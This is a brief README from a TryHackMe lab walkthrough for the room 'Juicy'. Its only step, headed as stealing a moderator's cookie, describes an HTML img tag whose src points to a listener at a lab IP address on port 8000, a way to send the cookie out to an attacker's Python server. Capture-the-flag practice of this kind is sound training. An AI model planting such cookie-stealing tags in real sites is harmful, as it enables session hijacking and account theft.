djalilayed/tryhackme/Juicy/readme.md

 **Below commands used on TryHackMe room Juice YouTube video walk through:**

-### Stealing mod cookie and send it to python server

 ```
 create an HTML img tag where the src URL http://10.80.114.71:8000/
 ```